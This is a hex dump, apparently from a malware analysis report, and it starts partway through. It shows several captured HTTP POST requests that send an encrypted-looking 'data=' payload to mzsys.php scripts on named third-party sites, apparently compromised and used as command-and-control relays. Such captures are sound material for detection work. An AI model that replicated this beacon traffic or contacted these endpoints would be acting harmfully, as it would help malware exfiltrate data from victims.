0x00000230 (00560)   42344542 33343533 45363644 43413045   B4EB3453E66DCA0E
0x00000240 (00576)   42354243 30413942 35364432 43423343   B5BC0A9B56D2CB3C
0x00000250 (00592)   36413132 38304632 42373945 33373943   6A1280F2B79E379C
0x00000260 (00608)   32433336 43303646 36423739 32313233   2C36C06F6B792123
0x00000270 (00624)   42333330 30363730 35343737 30343335   B330067054770435
0x00000280 (00640)   32444639 32334343 35334336 39454143   2DF923CC53C69EAC
0x00000290 (00656)   31393541 38394645 41453130 38353545   195A89FEAE10855E
0x000002a0 (00672)   45453830 46413045 30454145 36423639   EE80FA0E0EAE6B69
0x000002b0 (00688)   36433745 31443235 37363346 43424138   6C7E1D25763FCBA8
0x000002c0 (00704)   35303643 35343235 38374130 42423443   506C542587A0BB4C
0x000002d0 (00720)   37443141 32343746 35323233 43463133   7D1A247F5223CF13
0x000002e0 (00736)   41434144 30433641 37413442 34324134   ACAD0C6A7A4B42A4
0x000002f0 (00752)   30424132 39453433 33443335 31384642   0BA29E433D3518FB
0x00000300 (00768)   39463146 42453546 31443244 33324346   9F1FBE5F1D2D32CF
0x00000310 (00784)   34453146 45463136 36454639 44434144   4E1FEF166EF9DCAD
0x00000320 (00800)   30383045 46463945 33433939 43393833   080EFF9E3C99C983
0x00000330 (00816)   45363337 33323239 42424333 34314338   E6373229BBC341C8
0x00000340 (00832)   33323044 45424331 30353536 35323730   320DEBC105565270
0x00000350 (00848)   35384430 30393442 42434443 38334145   58D0094BBCDC83AE
0x00000360 (00864)   37343236 37324642 46363731 46424138   742672FBF671FBA8
0x00000370 (00880)   39323145 35413236 32373942 36383635   921E5A26279B6865
0x00000380 (00896)   34313235 36413235 46353136 37384542   41256A25F51678EB
0x00000390 (00912)   35444434 46373335 45433537 33383736   5DD4F735EC573876
0x000003a0 (00928)   30343839 43463839 34433232 30413036   0489CF894C220A06
0x000003b0 (00944)   44414543 35374131 44383837 32353330   DAEC57A1D8872530
0x000003c0 (00960)   38353330 38                           85308

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202ced 04d0432c 202c202c   cept: ,...C, , ,
0x00000030 (00048)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 200d0a43 6f6e7465    , , , , ..Conte
0x00000060 (00096)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x00000070 (00112)   74696f6e 2f782d77 77772d66 6f726d2d   tion/x-www-form-
0x00000080 (00128)   75726c65 6e636f64 65640d0a 55736572   urlencoded..User
0x00000090 (00144)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000a0 (00160)   352e3020 2857696e 646f7773 204e5420   5.0 (Windows NT 
0x000000b0 (00176)   362e333b 20574f57 36343b20 54726964   6.3; WOW64; Trid
0x000000c0 (00192)   656e742f 372e303b 20546f75 63683b20   ent/7.0; Touch; 
0x000000d0 (00208)   72763a31 312e3029 206c696b 65204765   rv:11.0) like Ge
0x000000e0 (00224)   636b6f0d 0a486f73 743a2063 686f6e62   cko..Host: chonb
0x000000f0 (00240)   75726963 6f6f702e 6e65740d 0a436f6e   uricoop.net..Con
0x00000100 (00256)   74656e74 2d4c656e 6774683a 20363435   tent-Length: 645
0x00000110 (00272)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000120 (00288)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x00000130 (00304)   613d4446 39363843 45363842 34374436   a=DF968CE68B47D6
0x00000140 (00320)   45313135 36323346 36464632 41314537   E115623F6FF2A1E7
0x00000150 (00336)   42324444 32444136 30313731 45414234   B2DD2DA60171EAB4
0x00000160 (00352)   45463346 35424144 31413735 32464532   EF3F5BAD1A752FE2
0x00000170 (00368)   37303739 36363637 45364343 30304238   70796667E6CC00B8
0x00000180 (00384)   44374634 41314331 42323232 30433233   D7F4A1C1B2220C23
0x00000190 (00400)   37353332 32333646 37394333 45444533   7532236F79C3EDE3
0x000001a0 (00416)   33394645 31443935 35343533 38413146   39FE1D9554538A1F
0x000001b0 (00432)   38373437 30363544 44373537 30353530   8747065DD7570550
0x000001c0 (00448)   46333036 36303636 33354336 45334532   F306606635C6E3E2
0x000001d0 (00464)   35314132 32453131 33384235 32374237   51A22E1138B527B7
0x000001e0 (00480)   30443636 35454142 36314642 32363145   0D665EAB61FB261E
0x000001f0 (00496)   45343230 35393646 32363846 39364343   E420596F268F96CC
0x00000200 (00512)   46433339 32323139 32323538 30433238   FC39221922580C28
0x00000210 (00528)   45363543 43353043 31303430 36354434   E65CC50C104065D4
0x00000220 (00544)   30423445 42333435 33453636 44434130   0B4EB3453E66DCA0
0x00000230 (00560)   45423542 43304139 42353644 32434233   EB5BC0A9B56D2CB3
0x00000240 (00576)   43364131 32383046 32423739 45333739   C6A1280F2B79E379
0x00000250 (00592)   43324333 36433036 46364237 39323132   C2C36C06F6B79212
0x00000260 (00608)   33423333 30303637 30353437 37303433   3B33006705477043
0x00000270 (00624)   35324446 39323343 43353343 36394541   52DF923CC53C69EA
0x00000280 (00640)   43313935 41383946 45414531 30383535   C195A89FEAE10855
0x00000290 (00656)   45454538 30464130 45304541 45364236   EEE80FA0E0EAE6B6
0x000002a0 (00672)   39364337 45314432 35373633 46434241   96C7E1D25763FCBA
0x000002b0 (00688)   38353036 43353432 35383741 30424234   8506C542587A0BB4
0x000002c0 (00704)   43374431 41323437 46353232 33434631   C7D1A247F5223CF1
0x000002d0 (00720)   33414341 44304336 41374134 42343241   3ACAD0C6A7A4B42A
0x000002e0 (00736)   34304241 32394534 33334433 35313846   40BA29E433D3518F
0x000002f0 (00752)   42394631 46424535 46314432 44333243   B9F1FBE5F1D2D32C
0x00000300 (00768)   46344531 46454631 36364546 39444341   F4E1FEF166EF9DCA
0x00000310 (00784)   44303830 45464639 45334339 39433938   D080EFF9E3C99C98
0x00000320 (00800)   33453633 37333232 39424243 33343143   3E6373229BBC341C
0x00000330 (00816)   38333230 44454243 31303535 36353237   8320DEBC10556527
0x00000340 (00832)   30353844 30303934 42424344 43383341   058D0094BBCDC83A
0x00000350 (00848)   45373432 36373246 42463637 31464241   E742672FBF671FBA
0x00000360 (00864)   38393231 45354132 36323739 42363836   8921E5A26279B686
0x00000370 (00880)   35343132 35364132 35463531 36373845   541256A25F51678E
0x00000380 (00896)   42354444 34463733 35454335 37333837   B5DD4F735EC57387
0x00000390 (00912)   36303438 39434638 39344332 32304130   60489CF894C220A0
0x000003a0 (00928)   36444145 43353741 31443838 37323533   6DAEC57A1D887253
0x000003b0 (00944)   30384543 35374131 44383837 32353330   08EC57A1D8872530
0x000003c0 (00960)   38353330 38                           85308

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a202c ed04d043 2c202c20 2c202c20   t: ,...C, , , , 
0x00000060 (00096)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000070 (00112)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000080 (00128)   2c202c20 2c200d0a 436f6e74 656e742d   , , , ..Content-
0x00000090 (00144)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000a0 (00160)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000b0 (00176)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000c0 (00192)   656e743a 204d6f7a 696c6c61 2f352e30   ent: Mozilla/5.0
0x000000d0 (00208)   20285769 6e646f77 73204e54 20362e33    (Windows NT 6.3
0x000000e0 (00224)   3b20574f 5736343b 20547269 64656e74   ; WOW64; Trident
0x000000f0 (00240)   2f372e30 3b20546f 7563683b 2072763a   /7.0; Touch; rv:
0x00000100 (00256)   31312e30 29206c69 6b652047 65636b6f   11.0) like Gecko
0x00000110 (00272)   0d0a486f 73743a20 70617373 6c696674   ..Host: passlift
0x00000120 (00288)   2e636f6d 0d0a436f 6e74656e 742d4c65   .com..Content-Le
0x00000130 (00304)   6e677468 3a203634 350d0a43 61636865   ngth: 645..Cache
0x00000140 (00320)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000150 (00336)   68650d0a 0d0a6461 74613d44 46393638   he....data=DF968
0x00000160 (00352)   43453638 42343744 36453131 35363233   CE68B47D6E115623
0x00000170 (00368)   46364646 32413145 37423244 44324441   F6FF2A1E7B2DD2DA
0x00000180 (00384)   36303137 31454142 34454633 46354241   60171EAB4EF3F5BA
0x00000190 (00400)   44314137 35324645 32373037 39363636   D1A752FE27079666
0x000001a0 (00416)   37453643 43303042 38443746 34413143   7E6CC00B8D7F4A1C
0x000001b0 (00432)   31423232 32304332 33373533 32323336   1B2220C237532236
0x000001c0 (00448)   46373943 33454445 33333946 45314439   F79C3EDE339FE1D9
0x000001d0 (00464)   35353435 33384131 46383734 37303635   554538A1F8747065
0x000001e0 (00480)   44443735 37303535 30463330 36363036   DD7570550F306606
0x000001f0 (00496)   36333543 36453345 32353141 32324531   635C6E3E251A22E1
0x00000200 (00512)   31333842 35323742 37304436 36354541   138B527B70D665EA
0x00000210 (00528)   42363146 42323631 45453432 30353936   B61FB261EE420596
0x00000220 (00544)   46323638 46393643 43464333 39323231   F268F96CCFC39221
0x00000230 (00560)   39323235 38304332 38453635 43433530   922580C28E65CC50
0x00000240 (00576)   43313034 30363544 34304234 45423334   C104065D40B4EB34
0x00000250 (00592)   35334536 36444341 30454235 42433041   53E66DCA0EB5BC0A
0x00000260 (00608)   39423536 44324342 33433641 31323830   9B56D2CB3C6A1280
0x00000270 (00624)   46324237 39453337 39433243 33364330   F2B79E379C2C36C0
0x00000280 (00640)   36463642 37393231 32334233 33303036   6F6B792123B33006
0x00000290 (00656)   37303534 37373034 33353244 46393233   70547704352DF923
0x000002a0 (00672)   43433533 43363945 41433139 35413839   CC53C69EAC195A89
0x000002b0 (00688)   46454145 31303835 35454545 38304641   FEAE10855EEE80FA
0x000002c0 (00704)   30453045 41453642 36393643 37453144   0E0EAE6B696C7E1D
0x000002d0 (00720)   32353736 33464342 41383530 36433534   25763FCBA8506C54
0x000002e0 (00736)   32353837 41304242 34433744 31413234   2587A0BB4C7D1A24
0x000002f0 (00752)   37463532 32334346 31334143 41443043   7F5223CF13ACAD0C
0x00000300 (00768)   36413741 34423432 41343042 41323945   6A7A4B42A40BA29E
0x00000310 (00784)   34333344 33353138 46423946 31464245   433D3518FB9F1FBE
0x00000320 (00800)   35463144 32443332 43463445 31464546   5F1D2D32CF4E1FEF
0x00000330 (00816)   31363645 46394443 41443038 30454646   166EF9DCAD080EFF
0x00000340 (00832)   39453343 39394339 38334536 33373332   9E3C99C983E63732
0x00000350 (00848)   32394242 43333431 43383332 30444542   29BBC341C8320DEB
0x00000360 (00864)   43313035 35363532 37303538 44303039   C10556527058D009
0x00000370 (00880)   34424243 44433833 41453734 32363732   4BBCDC83AE742672
0x00000380 (00896)   46424636 37314642 41383932 31453541   FBF671FBA8921E5A
0x00000390 (00912)   32363237 39423638 36353431 32353641   26279B686541256A
0x000003a0 (00928)   32354635 31363738 45423544 44344637   25F51678EB5DD4F7
0x000003b0 (00944)   33354543 35373338 37363034 38394346   35EC5738760489CF
0x000003c0 (00960)   38393443 32323041 30364441 45433537   894C220A06DAEC57
0x000003d0 (00976)   41314438 38373235 333038              A1D88725308

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202ced 04d0432c 202c202c   cept: ,...C, , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 200d0a43 6f6e7465    , , , , ..Conte
0x00000070 (00112)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x00000080 (00128)   74696f6e 2f782d77 77772d66 6f726d2d   tion/x-www-form-
0x00000090 (00144)   75726c65 6e636f64 65640d0a 55736572   urlencoded..User
0x000000a0 (00160)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000b0 (00176)   352e3020 2857696e 646f7773 204e5420   5.0 (Windows NT 
0x000000c0 (00192)   362e333b 20574f57 36343b20 54726964   6.3; WOW64; Trid
0x000000d0 (00208)   656e742f 372e303b 20546f75 63683b20   ent/7.0; Touch; 
0x000000e0 (00224)   72763a31 312e3029 206c696b 65204765   rv:11.0) like Ge
0x000000f0 (00240)   636b6f0d 0a486f73 743a2061 6374696f   cko..Host: actio
0x00000100 (00256)   6e706f75 72697372 61656c2e 636f6d0d   npourisrael.com.
0x00000110 (00272)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000120 (00288)   20363435 0d0a4361 6368652d 436f6e74    645..Cache-Cont
0x00000130 (00304)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000140 (00320)   0a646174 613d4446 39363843 45363842   .data=DF968CE68B
0x00000150 (00336)   34374436 45313135 36323346 36464632   47D6E115623F6FF2
0x00000160 (00352)   41314537 42324444 32444136 30313731   A1E7B2DD2DA60171
0x00000170 (00368)   45414234 45463346 35424144 31413735   EAB4EF3F5BAD1A75
0x00000180 (00384)   32464532 37303739 36363637 45364343   2FE270796667E6CC
0x00000190 (00400)   30304238 44374634 41314331 42323232   00B8D7F4A1C1B222
0x000001a0 (00416)   30433233 37353332 32333646 37394333   0C237532236F79C3
0x000001b0 (00432)   45444533 33394645 31443935 35343533   EDE339FE1D955453
0x000001c0 (00448)   38413146 38373437 30363544 44373537   8A1F8747065DD757
0x000001d0 (00464)   30353530 46333036 36303636 33354336   0550F306606635C6
0x000001e0 (00480)   45334532 35314132 32453131 33384235   E3E251A22E1138B5
0x000001f0 (00496)   32374237 30443636 35454142 36314642   27B70D665EAB61FB
0x00000200 (00512)   32363145 45343230 35393646 32363846   261EE420596F268F
0x00000210 (00528)   39364343 46433339 32323139 32323538   96CCFC3922192258
0x00000220 (00544)   30433238 45363543 43353043 31303430   0C28E65CC50C1040
0x00000230 (00560)   36354434 30423445 42333435 33453636   65D40B4EB3453E66
0x00000240 (00576)   44434130 45423542 43304139 42353644   DCA0EB5BC0A9B56D
0x00000250 (00592)   32434233 43364131 32383046 32423739   2CB3C6A1280F2B79
0x00000260 (00608)   45333739 43324333 36433036 46364237   E379C2C36C06F6B7
0x00000270 (00624)   39323132 33423333 30303637 30353437   92123B3300670547
0x00000280 (00640)   37303433 35324446 39323343 43353343   704352DF923CC53C
0x00000290 (00656)   36394541 43313935 41383946 45414531   69EAC195A89FEAE1
0x000002a0 (00672)   30383535 45454538 30464130 45304541   0855EEE80FA0E0EA
0x000002b0 (00688)   45364236 39364337 45314432 35373633   E6B696C7E1D25763
0x000002c0 (00704)   46434241 38353036 43353432 35383741   FCBA8506C542587A
0x000002d0 (00720)   30424234 43374431 41323437 46353232   0BB4C7D1A247F522
0x000002e0 (00736)   33434631 33414341 44304336 41374134   3CF13ACAD0C6A7A4
0x000002f0 (00752)   42343241 34304241 32394534 33334433   B42A40BA29E433D3
0x00000300 (00768)   35313846 42394631 46424535 46314432   518FB9F1FBE5F1D2
0x00000310 (00784)   44333243 46344531 46454631 36364546   D32CF4E1FEF166EF
0x00000320 (00800)   39444341 44303830 45464639 45334339   9DCAD080EFF9E3C9
0x00000330 (00816)   39433938 33453633 37333232 39424243   9C983E6373229BBC
0x00000340 (00832)   33343143 38333230 44454243 31303535   341C8320DEBC1055
0x00000350 (00848)   36353237 30353844 30303934 42424344   6527058D0094BBCD
0x00000360 (00864)   43383341 45373432 36373246 42463637   C83AE742672FBF67
0x00000370 (00880)   31464241 38393231 45354132 36323739   1FBA8921E5A26279
0x00000380 (00896)   42363836 35343132 35364132 35463531   B686541256A25F51
0x00000390 (00912)   36373845 42354444 34463733 35454335   678EB5DD4F735EC5
0x000003a0 (00928)   37333837 36303438 39434638 39344332   738760489CF894C2
0x000003b0 (00944)   32304130 36444145 43353741 31443838   20A06DAEC57A1D88
0x000003c0 (00960)   37323533 30383041 30364441 45433537   7253080A06DAEC57
0x000003d0 (00976)   41314438 38373235 333038              A1D88725308


Strings